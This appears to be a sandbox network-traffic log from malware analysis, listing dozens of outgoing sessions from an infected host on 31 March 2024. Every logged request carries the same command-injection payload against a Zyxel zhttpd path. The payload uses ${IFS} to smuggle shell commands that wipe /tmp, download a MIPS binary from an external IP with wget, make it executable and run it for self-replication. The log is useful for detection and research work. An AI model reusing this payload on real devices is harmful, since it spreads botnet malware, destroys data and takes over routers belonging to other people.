                                        Mar 31, 2024 09:21:18.876161098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4403192.168.2.2337864197.167.209.156443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.876197100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4404192.168.2.2340058172.61.129.21443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.876270056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4405192.168.2.2336522110.14.61.67443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.876337051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4406192.168.2.2344466212.173.215.27443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.876394033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4407192.168.2.2335264193.87.15.16443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.876476049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4408192.168.2.2357366188.42.58.206443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.876547098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4409192.168.2.2341928193.65.210.177443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.876597881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4410192.168.2.233853071.13.32.208443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.876692057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4411192.168.2.233412062.88.159.15443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.876741886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4412192.168.2.235785212.9.203.62443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.876805067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4413192.168.2.23362204.238.0.148443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.876882076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4414192.168.2.2349068155.225.107.139443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.876960993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4415192.168.2.2348988179.207.140.151443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.877015114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4416192.168.2.235564068.36.196.217443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.877069950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4417192.168.2.233465897.95.135.219443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.877166033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4418192.168.2.235331037.117.114.77443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.877198935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4419192.168.2.2358250185.192.202.144443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.877260923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4420192.168.2.234589241.86.27.30443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.877309084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4421192.168.2.234340062.227.150.2443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.877372026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4422192.168.2.235938836.234.62.235443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.877453089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4423192.168.2.2335874117.151.147.13443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.877505064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4424192.168.2.235198288.75.208.95443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.877595901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4425192.168.2.2350754151.179.38.241443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.877628088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4426192.168.2.233738234.142.231.233443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.877670050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4427192.168.2.2340214190.246.99.244443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.877728939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4428192.168.2.235683478.99.213.197443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.877798080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4429192.168.2.23358948.193.37.177443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.877868891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4430192.168.2.2359612164.76.78.174443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.877932072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4431192.168.2.2353086151.36.78.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.877968073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4432192.168.2.233369060.56.237.29443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.878022909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4433192.168.2.2335612146.40.233.138443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.878098011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4434192.168.2.23413485.142.184.57443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.878134012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4435192.168.2.2346472177.154.210.68443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.878192902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4436192.168.2.2336070182.79.254.116443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.878251076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4437192.168.2.234369453.231.77.62443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.878349066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4438192.168.2.234923291.177.45.79443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.878401995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4439192.168.2.2349140114.240.166.238443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.878453970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4440192.168.2.2347486145.15.176.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.878515005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4441192.168.2.235972695.38.137.95443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.878575087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4442192.168.2.2340332141.10.60.116443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.878638983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4443192.168.2.233504883.230.87.248443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.878716946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4444192.168.2.234400862.63.153.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.878781080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4445192.168.2.2341632203.63.232.140443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.878869057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4446192.168.2.2338978207.99.132.244443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.878906012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4447192.168.2.235299281.132.105.242443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.878987074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4448192.168.2.2349150180.24.202.73443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.879019976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4449192.168.2.2360392158.114.44.229443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.879106998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4450192.168.2.2352970158.91.186.25443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.879147053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4451192.168.2.2347882206.46.100.195443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.879240036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4452192.168.2.2348490131.30.90.227443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.879283905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4453192.168.2.2355492155.6.249.218443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.879349947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4454192.168.2.234411894.209.239.137443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.879410982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4455192.168.2.2360636188.179.50.87443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.879482031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4456192.168.2.2344008193.94.106.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.879565954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4457192.168.2.235139893.235.179.214443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.879617929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4458192.168.2.2341766123.248.153.179443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.879692078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4459192.168.2.2345872195.36.170.30443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.879745007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4460192.168.2.234456879.107.180.123443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.879806042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4461192.168.2.2334948205.214.95.53443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.879873991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4462192.168.2.2359618167.5.227.122443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.879918098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4463192.168.2.2337702169.166.50.37443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.880019903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4464192.168.2.235468213.85.45.155443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.880065918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4465192.168.2.234030648.65.61.158443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.880167961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4466192.168.2.2341064128.114.232.110443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.880211115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4467192.168.2.235666868.121.77.118443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.880280018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4468192.168.2.2351608220.139.190.142443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.880412102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4469192.168.2.235459862.136.176.196443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.880435944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4470192.168.2.2351174102.219.165.251443
                                        TimestampBytes transferredDirectionData
